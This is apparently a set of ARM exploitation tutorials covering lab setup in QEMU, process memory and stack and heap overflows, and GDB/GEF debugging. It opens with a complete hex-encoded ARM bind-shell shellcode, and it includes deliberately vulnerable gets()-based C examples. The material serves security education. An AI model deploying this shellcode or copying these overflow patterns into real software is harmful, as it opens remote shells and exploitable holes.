pi@raspberrypi:~/bindshell $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bind_shell.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58

Voilà, le bind shellcode! This shellcode is 112 bytes long. Since this is a beginner tutorial and to keep it simple, the shellcode is not as short as it could be. After making the initial shellcode work, you can try to find ways to reduce the amount of instructions, hence making the shellcode shorter.

ARM LAB ENVIRONMENT

Let’s say you got curious about ARM assembly or exploitation and want to write your first assembly scripts or solve some ARM challenges. For that you either need an Arm device (e.g. Raspberry Pi), or you set up your lab environment in a VM for quick access.

This page contains 3 levels of lab setup laziness.

  • Manual Setup – Level 0
  • Ain’t nobody got time for that – Level 1
  • Ain’t nobody got time for that – Level 2
MANUAL SETUP – LEVEL 0

If you have the time and nerves to set up the lab environment yourself, I’d recommend doing it. You might get stuck, but you might also learn a lot in the process. Knowing how to emulate things with QEMU also enables you to choose what ARM version you want to emulate in case you want to practice on a specific processor.

How to emulate Raspbian with QEMU.

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 1

Welcome on laziness level 1. I see you don’t have time to struggle through various linux and QEMU errors, or maybe you’ve tried setting it up yourself but some random error occurred and after spending hours trying to fix it, you’ve had enough.

Don’t worry, here’s a solution: Hugsy (aka creator of GEF) released ready-to-play Qemu images for architectures like ARM, MIPS, PowerPC, SPARC, AARCH64, etc. to play with. All you need is Qemu. Then download the link to your image, and unzip the archive.

Become a ninja on non-x86 architectures

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 2

Let me guess, you don’t want to bother with any of this and just want a ready-made Ubuntu VM with all QEMU stuff setup and ready-to-play. Very well. The first Azeria-Labs VM is ready. It’s a naked Ubuntu VM containing an emulated ARMv6l.

This VM is also for those of you who tried emulating ARM with QEMU but got stuck for inexplicable linux reasons. I understand the struggle, trust me.

Download here:

VMware image size:

  • Downloaded zip: Azeria-Lab-v1.7z (4.62 GB)
    • MD5: C0EA2F16179CF813D26628DC792C5DE6
    • SHA1: 1BB1ABF3C277E0FD06AF0AECFEDF7289730657F2
  • Extracted VMware image: ~16GB

Password: azerialabs

Host system specs:

  • Ubuntu 16.04.3 LTS 64-bit (kernel 4.10.0-38-generic) with Gnome 3
  • HDD: ~26GB (ext4) + ~4GB Swap
  • RAM (configured): 4GB

QEMU setup:

  • Raspbian 8 (27-04-10-raspbian-jessie) 32-bit (kernel qemu-4.4.34-jessie)
  • HDD: ~8GB
  • RAM: ~256MB
  • Tools: GDB (Raspbian 7.7.1+dfsg-5+rpi1) with GEF

I’ve included a Lab VM Starter Guide and set it as the background image of the VM. It explains how to start up QEMU, how to write your first assembly program, how to assemble and disassemble, and some debugging basics. Enjoy!

ARM PROCESS MEMORY AND MEMORY CORRUPTIONS

PROCESS MEMORY AND MEMORY CORRUPTIONS

The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the first tutorial series “ARM Assembly Basics“). In this chapter you will get an introduction into the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and how they look like in a debugger.

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer
  3. Format String

The examples used in this tutorial are compiled on an ARMv6 32-bit processor. If you don’t have access to an ARM device, you can create your own lab and emulate a Raspberry Pi distro in a VM by following this tutorial: Emulate Raspberry Pi with QEMU. The debugger used here is GDB with GEF (GDB Enhanced Features). If you aren’t familiar with these tools, you can check out this tutorial: Debugging with GDB and GEF.

MEMORY LAYOUT OF A PROCESS

Every time we start a program, a memory area for that program is reserved. This area is then split into multiple regions. Those regions are then split into even more regions (segments), but we will stick with the general overview. So, the parts we are interested are:

  1. Program Image
  2. Heap
  3. Stack

In the picture below we can see a general representation of how those parts are laid out within the process memory. The addresses used to specify memory regions are just for the sake of an example, because they will differ from environment to environment, especially when ASLR is used.

Program Image region basically holds the program’s executable file which got loaded into the memory. This memory region can be split into various segments: .plt, .text, .got, .data, .bss and so on. These are the most relevant. For example, .text contains the executable part of the program with all the Assembly instructions, .data and .bss holds the variables or pointers to variables used in the application, .plt and .got stores specific pointers to various imported functions from, for example, shared libraries. From a security standpoint, if an attacker could affect the integrity (rewrite) of the .text section, he could execute arbitrary code. Similarly, corruption of Procedure Linkage Table (.plt) and Global Offsets Table (.got) could under specific circumstances lead to execution of arbitrary code.

The Stack and Heap regions are used by the application to store and operate on temporary data (variables) that are used during the execution of the program. These regions are commonly exploited by attackers, because data in the Stack and Heap regions can often be modified by the user’s input, which, if not handled properly, can cause a memory corruption. We will look into such cases later in this chapter.

In addition to the mapping of the memory, we need to be aware of the attributes associated with different memory regions. A memory region can have one or a combination of the following attributes: Read, Write, eXecute. The Read attribute allows the program to read data from a specific region. Similarly, Write allows the program to write data into a specific memory region, and Execute – execute instructions in that memory region. We can see the process memory regions in GEF (a highly recommended extension for GDB) as shown below:

azeria@labs:~/exp $ gdb program
...
gef> gef config context.layout "code"
gef> break main
Breakpoint 1 at 0x104c4: file program.c, line 6.
gef> run
...
gef> nexti 2
-----------------------------------------------------------------------------------------[ code:arm ]----
...
      0x104c4 <main+20>        mov    r0,  #8
      0x104c8 <main+24>        bl     0x1034c <malloc@plt>
->    0x104cc <main+28>        mov    r3,  r0
      0x104d0 <main+32>        str    r3,  [r11,  #-8]
...
gef> vmmap
Start      End        Offset     Perm Path
0x00010000 0x00011000 0x00000000 r-x /home/azeria/exp/program <---- Program Image
0x00020000 0x00021000 0x00000000 rw- /home/azeria/exp/program <---- Program Image continues...
0x00021000 0x00042000 0x00000000 rw- [heap] <---- HEAP
0xb6e74000 0xb6f9f000 0x00000000 r-x /lib/arm-linux-gnueabihf/libc-2.19.so <---- Shared library (libc)
0xb6f9f000 0xb6faf000 0x0012b000 --- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6faf000 0xb6fb1000 0x0012b000 r-- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb1000 0xb6fb2000 0x0012d000 rw- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb2000 0xb6fb5000 0x00000000 rw-
0xb6fcc000 0xb6fec000 0x00000000 r-x /lib/arm-linux-gnueabihf/ld-2.19.so <---- Shared library (ld)
0xb6ffa000 0xb6ffb000 0x00000000 rw-
0xb6ffb000 0xb6ffc000 0x0001f000 r-- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffc000 0xb6ffd000 0x00020000 rw- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffd000 0xb6fff000 0x00000000 rw-
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rw- [stack] <---- STACK
0xffff0000 0xffff1000 0x00000000 r-x [vectors]

The Heap section in the vmmap command output appears only after some Heap related function was used. In this case we see the malloc function being used to create a buffer in the Heap region. So if you want to try this out, you would need to debug a program that makes a malloc call (you can find some examples in this page, scroll down or use find function).

Additionally, in Linux we can inspect the process’ memory layout by accessing a process-specific “file”:

azeria@labs:~/exp $ ps aux | grep program
azeria   31661 12.3 12.1  38680 30756 pts/0    S+   23:04   0:10 gdb program
azeria   31665  0.1  0.2   1712   748 pts/0    t    23:04   0:00 /home/azeria/exp/program
azeria   31670  0.0  0.7   4180  1876 pts/1    S+   23:05   0:00 grep --color=auto program
azeria@labs:~/exp $ cat /proc/31665/maps
00010000-00011000 r-xp 00000000 08:02 274721     /home/azeria/exp/program
00020000-00021000 rw-p 00000000 08:02 274721     /home/azeria/exp/program
00021000-00042000 rw-p 00000000 00:00 0          [heap]
b6e74000-b6f9f000 r-xp 00000000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6f9f000-b6faf000 ---p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6faf000-b6fb1000 r--p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb1000-b6fb2000 rw-p 0012d000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb2000-b6fb5000 rw-p 00000000 00:00 0
b6fcc000-b6fec000 r-xp 00000000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffa000-b6ffb000 rw-p 00000000 00:00 0
b6ffb000-b6ffc000 r--p 0001f000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffc000-b6ffd000 rw-p 00020000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffd000-b6fff000 rw-p 00000000 00:00 0
b6fff000-b7000000 r-xp 00000000 00:00 0          [sigpage]
befdf000-bf000000 rw-p 00000000 00:00 0          [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]

Most programs are compiled in a way that they use shared libraries. Those libraries are not part of the program image (even though it is possible to include them via static linking) and therefore have to be referenced (included) dynamically. As a result, we see the libraries (libc, ld, etc.) being loaded in the memory layout of a process. Roughly speaking, the shared libraries are loaded somewhere in the memory (outside of process’ control) and our program just creates virtual “links” to that memory region. This way we save memory without the need to load the same library in every instance of a program.

INTRODUCTION INTO MEMORY CORRUPTIONS

A memory corruption is a software bug type that allows to modify the memory in a way that was not intended by the programmer. In most cases, this condition can be exploited to execute arbitrary code, disable security mechanisms, etc. This is done by crafting and injecting a payload which alters certain memory sections of a running program. The following list contains the most common memory corruption types/vulnerabilities:

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer (Use-after-free)
  3. Format String

In this chapter we will try to get familiar with the basics of Buffer Overflow memory corruption vulnerabilities (the remaining ones will be covered in the next chapter). In the examples we are about to cover we will see that the main cause of memory corruption vulnerabilities is an improper user input validation, sometimes combined with a logical flaw. For a program, the input (or a malicious payload) might come in a form of a username, file to be opened, network packet, etc. and can often be influenced by the user. If a programmer did not put safety measures for potentially harmful user input it is often the case that the target program will be subject to some kind of memory related issue.

BUFFER OVERFLOWS

Buffer overflows are one of the most widespread memory corruption classes and are usually caused by a programming mistake which allows the user to supply more data than there is available for the destination variable (buffer). This happens, for example, when vulnerable functions, such as getsstrcpymemcpy or others are used along with data supplied by the user. These functions do not check the length of the user’s data which can result into writing past (overflowing) the allocated buffer. To get a better understanding, we will look into basics of Stack and Heap based buffer overflows.

Stack Overflow

Stack overflow, as the name suggests, is a memory corruption affecting the Stack. While in most cases arbitrary corruption of the Stack would most likely result in a program’s crash, a carefully crafted Stack buffer overflow can lead to arbitrary code execution. The following picture shows an abstract overview of how the Stack can get corrupted.

As you can see in the picture above, the Stack frame (a small part of the whole Stack dedicated for a specific function) can have various components: user data, previous Frame Pointer, previous Link Register, etc. In case the user provides too much of data for a controlled variable, the FP and LR fields might get overwritten. This breaks the execution of the program, because the user corrupts the address where the application will return/jump after the current function is finished.

To check how it looks like in practice we can use this example:

/*azeria@labs:~/exp $ gcc stack.c -o stack*/
#include "stdio.h"

int main(int argc, char **argv)
{
char buffer[8];
gets(buffer);
}

Our sample program uses the variable “buffer”, with the length of 8 characters, and a function “gets” for user’s input, which simply sets the value of the variable “buffer” to whatever input the user provides. The disassembled code of this program looks like the following:

Here we suspect that a memory corruption could happen right after the function “gets” is completed. To investigate this, we place a break-point right after the branch instruction that calls the “gets” function – in our case, at address 0x0001043c. To reduce the noise we configure GEF’s layout to show us only the code and the Stack (see the command in the picture below). Once the break-point is set, we proceed with the program and provide 7 A’s as the user’s input (we use 7 A’s, because a null-byte will be automatically appended by function “gets”).

When we investigate the Stack of our example we see (image above) that the Stack frame is not corrupted. This is because the input supplied by the user fits in the expected 8 byte buffer and the previous FP and LR values within the Stack frame are not corrupted. Now let’s provide 16 A’s and see what happens.

In the second example we see (image above) that when we provide too much of data for the function “gets”, it does not stop at the boundaries of the target buffer and keeps writing “down the Stack”. This causes our previous FP and LR values to be corrupted. When we continue running the program, the program crashes (causes a “Segmentation fault”), because during the epilogue of the current function the previous values of FP and LR are “poped” off the Stack into R11 and PC registers forcing the program to jump to address 0x41414140 (last byte gets automatically converted to 0x40 because of the switch to Thumb mode), which in this case is an illegal address. The picture below shows us the values of the registers (take a look at $pc) at the time of the crash.

Heap Overflow

First of all, Heap is a more complicated memory location, mainly because of the way it is managed. To keep things simple, we stick with the fact that every object placed in the Heap memory section is “packed” into a “chunk” having two parts: header and user data (which sometimes the user controls fully). In the Heap’s case, the memory corruption happens when the user is able to write more data than is expected. In that case, the corruption might happen within the chunk’s boundaries (intra-chunk Heap overflow), or across the boundaries of two (or more) chunks (inter-chunk Heap overflow). To put things in perspective, let’s take a look at the following illustration.

As shown in the illustration above, the intra-chunk heap overflow happens when the user has the ability to supply more data to u_data_1and cross the boundary between u_data_1 and u_data_2. In this way the fields/properties of the current object get corrupted. If the user supplies more data than the current Heap chunk can accommodate, then the overflow becomes inter-chunk and results into a corruption of the adjacent chunk(s).

Intra-chunk Heap overflow

To illustrate how an intra-chunk Heap overflow looks like in practice we can use the following example and compile it with “-O” (optimization flag) to have a smaller (binary) program (easier to look through).

/*azeria@labs:~/exp $ gcc intra_chunk.c -o intra_chunk -O*/
#include "stdlib.h"
#include "stdio.h"

struct u_data                                          //object model: 8 bytes for name, 4 bytes for number
{
 char name[8];
 int number;
};

int main ( int argc, char* argv[] )
{
 struct u_data* objA = malloc(sizeof(struct u_data)); //create object in Heap

 objA->number = 1234;                                 //set the number of our object to a static value
 gets(objA->name);                                    //set name of our object according to user's input

 if(objA->number == 1234)                             //check if static value is intact
 {
  puts("Memory valid");
 }
 else                                                 //proceed here in case the static value gets corrupted
 {
  puts("Memory corrupted");
 }
}

The program above does the following:

  1. Defines a data structure (u_data) with two fields
  2. Creates an object (in the Heap memory region) of type u_data
  3. Assigns a static value to the number’s field of the object
  4. Prompts user to supply a value for the name’s field of the object
  5. Prints a string depending on the value of the number’s field

So in this case we also suspect that the corruption might happen after the function “gets”. We disassemble the target program’s main function to get the address for a break-point.

In this case we set the break-point at address 0x00010498 – right after the function “gets” is completed. We configure GEF to show us the code only. We then run the program and provide 7 A’s as a user input.

Once the break-point is hit, we quickly lookup the memory layout of our program to find where our Heap is. We use vmmap command and see that our Heap starts at the address 0x00021000. Given the fact that our object (objA) is the first and the only one created by the program, we start analyzing the Heap right from the beginning.

The picture above shows us a detailed break down of the Heap’s chunk associated with our object. The chunk has a header (8 bytes) and the user’s data section (12 bytes) storing our object. We see that the name field properly stores the supplied string of 7 A’s, terminated by a null-byte. The number field, stores 0x4d2 (1234 in decimal). So far so good. Let’s repeat these steps, but in this case enter 8 A’s.

While examining the Heap this time we see that the number’s field got corrupted (it’s now equal to 0x400 instead of 0x4d2). The null-byte terminator overwrote a portion (last byte) of the number’s field. This results in an intra-chunk Heap memory corruption. Effects of such a corruption in this case are not devastating, but visible. Logically, the else statement in the code should never be reached as the number’s field is intended to be static. However, the memory corruption we just observed makes it possible to reach that part of the code. This can be easily confirmed by the example below.

Inter-chunk Heap overflow

To illustrate how an inter-chunk Heap overflow looks like in practice we can use the following example, which we now compile withoutoptimization flag.

/*azeria@labs:~/exp $ gcc inter_chunk.c -o inter_chunk*/
#include "stdlib.h"
#include "stdio.h"

int main ( int argc, char* argv[] )
{
 char *some_string = malloc(8);  //create some_string "object" in Heap
 int *some_number = malloc(4);   //create some_number "object" in Heap

 *some_number = 1234;            //assign some_number a static value
 gets(some_string);              //ask user for input for some_string

 if(*some_number == 1234)        //check if static value (of some_number) is in tact
 {
 puts("Memory valid");
 }
 else                            //proceed here in case the static some_number gets corrupted
 {
 puts("Memory corrupted");
 }
}

The process here is similar to the previous ones: set a break-point after function “gets”, run the program, supply 7 A’s, investigate Heap.

Once the break-point is hit, we examine the Heap. In this case, we have two chunks. We see (image below) that their structure is in tact: the some_string is within its boundaries, the some_number is equal to 0x4d2.

Now, let’s supply 16 A’s and see what happens.

As you might have guessed, providing too much of input causes the overflow resulting into corruption of the adjacent chunk. In this case we see that our user input corrupted the header and the first byte of the some_number’s field. Here again, by corrupting the some_number we manage to reach the code section which logically should never be reached.

SUMMARY

In this part of the tutorial we got familiar with the process memory layout and the basics of Stack and Heap related memory corruptions. In the next part of this tutorial series we will cover other memory corruptions: Dangling pointer and Format String. Once we cover the most common types of memory corruptions, we will be ready for learning how to write working exploits.

ARM DEBUGGING WITH GDB

DEBUGGING WITH GDB

This is a very brief introduction into compiling ARM binaries and basic debugging with GDB. As you follow the tutorials, you might want to follow along and experiment with ARM assembly on your own. In that case, you would either need a spare ARM device, or you just set up your own Lab environment in a VM by following the steps in this short How-To.

You can use the following code from Stack and Functions, to get familiar with basic debugging with GDB.

.section .text
.global _start

_start:
    push {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #16   /* End of the prologue. Allocating some buffer on the stack */
    mov r0, #1        /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    mov r1, #2        /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    bl max            /* Calling/branching to function max */
    sub sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11, pc}     /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

max:
    push {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #12   /* End of the prologue. Allocating some buffer on the stack */
    cmp r0, r1        /* Implementation of if(a<b) */
    movlt r0, r1      /* if r0 was lower than r1, store r1 into r0 */
    add sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11}         /* restoring frame pointer */
    bx lr             /* End of the epilogue. Jumping back to main via LR register */

Personally, I prefer using GEF as a GDB extension. It gives me a better overview and useful features. You can try it out here: GEF – GDB Enhanced Features.

Save the code above in a file called max.s and compile it with the following commands:

$ as max.s -o max.o
$ ld max.o -o max

The debugger is a powerful tool that can:

  • Load a memory dump after a crash (post-mortem debugging)
  • Attach to a running process (used for server processes)
  • Launch a program and debug it

Launch GDB against either a binary, a core file, or a Process ID:

  • Attach to a process: $ gdb -pid $(pidof <process>)
  • Debug a binary: $ gdb ./file
  • Inspect a core (crash) file: $ gdb -c ./core.3243
$ gdb max

If you installed GEF, it drops you the gef> prompt.

This is how you get help:

  • (gdb) h
  • (gdb) apropos <search-term>
gef> apropos registers
collect -- Specify one or more data items to be collected at a tracepoint
core-file -- Use FILE as core dump for examining memory and registers
info all-registers -- List of all registers and their contents
info r -- List of integer registers and their contents
info registers -- List of integer registers and their contents
maintenance print cooked-registers -- Print the internal register configuration including cooked values
maintenance print raw-registers -- Print the internal register configuration including raw values
maintenance print registers -- Print the internal register configuration
maintenance print remote-registers -- Print the internal register configuration including each register's
p -- Print value of expression EXP
print -- Print value of expression EXP
registers -- Display full details on one
set may-write-registers -- Set permission to write into registers
set observer -- Set whether gdb controls the inferior in observer mode
show may-write-registers -- Show permission to write into registers
show observer -- Show whether gdb controls the inferior in observer mode
tui reg float -- Display only floating point registers
tui reg general -- Display only general registers
tui reg system -- Display only system registers

Breakpoint commands:

  • break (or just b) <function-name>
  • break <line-number>
  • break filename:function
  • break filename:line-number
  • break *<address>
  • break  +<offset>  
  • break  –<offset>
  • tbreak (set a temporary breakpoint)
  • del <number>  (delete breakpoint number x)
  • delete (delete all breakpoints)
  • delete <range> (delete breakpoint ranges)
  • disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them)
  • continue (or just c) – (continue executing until next breakpoint)
  • continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.)
  • finish (continue to end of function)
gef> break _start
gef> info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x00008054 <_start>
 breakpoint already hit 1 time
gef> del 1
gef> break *0x0000805c
Breakpoint 2 at 0x805c
gef> break _start

This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you would not delete the first breakpoint and just set a new one and run, it would break at the first breakpoint.

Start and Stop:

  • Start program execution from beginning of the program
    • run
    • r
    • run <command-line-argument>
  • Stop program execution
    • kill
  • Exit GDB debugger
    • quit
    • q
gef> run

Now that our program broke exactly where we wanted, it’s time to examine the memory. The command “x” displays memory contents in various formats.

Syntax: x/<count><format><unit>
FORMAT UNIT
x – Hexadecimal b – bytes
d – decimal h – half words (2 bytes)
i – instructions w – words (4 bytes)
t – binary (two) g – giant words (8 bytes)
o – octal
u – unsigned
s – string
c – character
gef> x/10i $pc
=> 0x8054 <_start>: push {r11, lr}
 0x8058 <_start+4>: add r11, sp, #0
 0x805c <_start+8>: sub sp, sp, #16
 0x8060 <_start+12>: mov r0, #1
 0x8064 <_start+16>: mov r1, #2
 0x8068 <_start+20>: bl 0x8074 <max>
 0x806c <_start+24>: sub sp, r11, #0
 0x8070 <_start+28>: pop {r11, pc}
 0x8074 <max>: push {r11}
 0x8078 <max+4>: add r11, sp, #0
gef> x/16xw $pc
0x8068 <_start+20>: 0xeb000001  0xe24bd000  0xe8bd8800  0xe92d0800
0x8078 <max+4>:     0xe28db000  0xe24dd00c  0xe1500001  0xb1a00001
0x8088 <max+20>:    0xe28bd000  0xe8bd0800  0xe12fff1e  0x00001741
0x8098:             0x61656100  0x01006962  0x0000000d  0x01080206

Commands for stepping through the code:

  • Step to next line of code. Will step into a function
    • stepi
    • s
    • step <number-of-steps-to-perform>
  • Execute next line of code. Will not enter functions
    • nexti
    • n
    • next <number>
  • Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number
    • until
    • until <line-number>
  • Show current line number and which function you are in
    • where
gef> nexti 5
...
0x8068 <_start+20> bl 0x8074 <max> <- $pc
0x806c <_start+24> sub sp, r11, #0
0x8070 <_start+28> pop {r11, pc}
0x8074 <max> push {r11}
0x8078 <max+4> add r11, sp, #0
0x807c <max+8> sub sp, sp, #12
0x8080 <max+12> cmp r0, r1
0x8084 <max+16> movlt r0, r1
0x8088 <max+20> add sp, r11, #0

Examine the registers with info registers or i r

gef> info registers
r0     0x1     1
r1     0x2     2
r2     0x0     0
r3     0x0     0
r4     0x0     0
r5     0x0     0
r6     0x0     0
r7     0x0     0
r8     0x0     0
r9     0x0     0
r10    0x0     0
r11    0xbefff7e8 3204446184
r12    0x0     0
sp     0xbefff7d8 0xbefff7d8
lr     0x0     0
pc     0x8068  0x8068 <_start+20>
cpsr   0x10    16

The command “info registers” gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1.

Show process memory map:

gef> info proc map
process 10225
Mapped address spaces:

 Start Addr   End Addr    Size     Offset objfile
     0x8000     0x9000  0x1000          0   /home/pi/lab/max
 0xb6fff000 0xb7000000  0x1000          0          [sigpage]
 0xbefdf000 0xbf000000 0x21000          0            [stack]
 0xffff0000 0xffff1000  0x1000          0          [vectors]

With the command “disassemble” we look through the disassembly output of the function max.

gef> disassemble max
 Dump of assembler code for function max:
 0x00008074 <+0>: push {r11}
 0x00008078 <+4>: add r11, sp, #0
 0x0000807c <+8>: sub sp, sp, #12
 0x00008080 <+12>: cmp r0, r1
 0x00008084 <+16>: movlt r0, r1
 0x00008088 <+20>: add sp, r11, #0
 0x0000808c <+24>: pop {r11}
 0x00008090 <+28>: bx lr
 End of assembler dump.

GEF specific commands (more commands can be viewed using the command “gef”):

  • Dump all sections of all loaded ELF images in process memory
    • xfiles
  • Enhanced version of proc map, includes RWX attributes in mapped pages
    • vmmap
  • Memory attributes at a given address
    • xinfo
  • Inspect compiler level protection built into the running binary
    • checksec
gef> xfiles
     Start        End  Name File
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
0x00008054 0x00008094 .text /home/pi/lab/max
gef> vmmap
     Start        End     Offset Perm Path
0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rwx [stack]
0xffff0000 0xffff1000 0x00000000 r-x [vectors]
gef> xinfo 0xbefff7e8
----------------------------------------[ xinfo: 0xbefff7e8 ]----------------------------------------
Found 0xbefff7e8
Page: 0xbefdf000 -> 0xbf000000 (size=0x21000)
Permissions: rwx
Pathname: [stack]
Offset (from page): +0x207e8
Inode: 0
gef> checksec
[+] checksec for '/home/pi/lab/max'
Canary:                  No
NX Support:              Yes
PIE Support:             No
RPATH:                   No
RUNPATH:                 No
Partial RelRO:           No
Full RelRO:              No
TROUBLESHOOTING

To make debugging with GDB more efficient it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature:

...
0x000104f8 <+72>: bl 0x10334
0x000104fc <+76>: mov r0, #8
0x00010500 <+80>: bl 0x1034c
0x00010504 <+84>: mov r3, r0
...

And this is the output of GDB (native, without gef) which has the feature I’m talking about:

0x000104f8 <+72>:    bl      0x10334 <free@plt>
0x000104fc <+76>:    mov     r0, #8
0x00010500 <+80>:    bl      0x1034c <malloc@plt>
0x00010504 <+84>:    mov     r3, r0

If you don’t have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB by yourself. If you choose to compile the GDB by yourself, you can use the following commands:

cd /tmp
wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz
tar vxzf gdb-7.12.tar.gz
sudo apt-get update
sudo apt-get install libreadline-dev python-dev texinfo -y
cd gdb-7.12
./configure --prefix=/usr --with-system-readline --with-python && make -j4
sudo make -j4 -C gdb/ install
gdb --version

I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. these commands will also replace the previous version of your GDB. If you don’t want that, then skip the command which ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took me a long time (hours), because of the limited resources (CPU) on the emulated environment. I used GDB version 7.12, but you would most likely succeed even with a newer version (click HERE for other versions).

RASPBERRY PI ON QEMU

RASPBERRY PI ON QEMU

Let’s start setting up a Lab VM. We will use Ubuntu and emulate our desired ARM versions inside of it.

First, get the latest Ubuntu version and run it in a VM:

For the QEMU emulation you will need the following:

  1. A Raspbian Image: http://downloads.raspberrypi.org/raspbian/images/raspbian-2017-04-10/ (other versions might work, but Jessie is recommended)
  2. Latest qemu kernel: https://github.com/dhruvvyas90/qemu-rpi-kernel

Inside your Ubuntu VM, create a new folder:

$ mkdir ~/qemu_vms/

Download and place the Raspbian Jessie image to ~/qemu_vms/.

Download and place the qemu-kernel to ~/qemu_vms/.

$ sudo apt-get install qemu-system
$ unzip <image-file>.zip
$ fdisk -l <image-file>

You should see something like this:

Disk 2017-03-02-raspbian-jessie.img: 4.1 GiB, 4393533440 bytes, 8581120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x432b3940

Device                          Boot  Start     End Sectors Size Id Type
2017-03-02-raspbian-jessie.img1        8192  137215  129024  63M  c W95 FAT32 (LBA)
2017-03-02-raspbian-jessie.img2      137216 8581119 8443904   4G 83 Linux

You see that the filesystem (.img2) starts at sector 137216. Now take that value and multiply it by 512, in this case it’s 512 * 137216 = 70254592 bytes. Use this value as an offset in the following command:

$ sudo mkdir /mnt/raspbian
$ sudo mount -v -o offset=70254592 -t ext4 ~/qemu_vms/<your-img-file.img> /mnt/raspbian
$ sudo nano /mnt/raspbian/etc/ld.so.preload

Comment out every entry in that file with ‘#’, save and exit with Ctrl-x » Y.

$ sudo nano /mnt/raspbian/etc/fstab

IF you see anything with mmcblk0 in fstab, then:

  1. Replace the first entry containing /dev/mmcblk0p1 with /dev/sda1
  2. Replace the second entry containing /dev/mmcblk0p2 with /dev/sda2, save and exit.
$ cd ~
$ sudo umount /mnt/raspbian

Now you can emulate it on Qemu by using the following command:

$ qemu-system-arm -kernel ~/qemu_vms/<your-kernel-qemu> -cpu arm1176 -m 256 -M versatilepb -serial stdio -append "root=/dev/sda2 rootfstype=ext4 rw" -hda ~/qemu_vms/<your-jessie-image.img> -redir tcp:5022::22 -no-reboot

If you see GUI of the Raspbian OS, you need to get into the terminal. Use Win key to get the menu, then navigate with arrow keys until you find Terminal application as shown below.

From the terminal, you need to start the SSH service so that you can access it from your host system (the one from which you launched the qemu).

Now you can SSH into it from your host system with (default password – raspberry):

$ ssh pi@127.0.0.1 -p 5022

For a more advanced network setup see the “Advanced Networking” paragraph below.

Troubleshooting

If SSH doesn’t start in your emulator at startup by default, you can change that inside your Pi terminal with:

$ sudo update-rc.d ssh enable

If your emulated Pi starts the GUI and you want to make it start in console mode at startup, use the following command inside your Pi terminal:

$ sudo raspi-config
>Select 3 – Boot Options
>Select B1 – Desktop / CLI
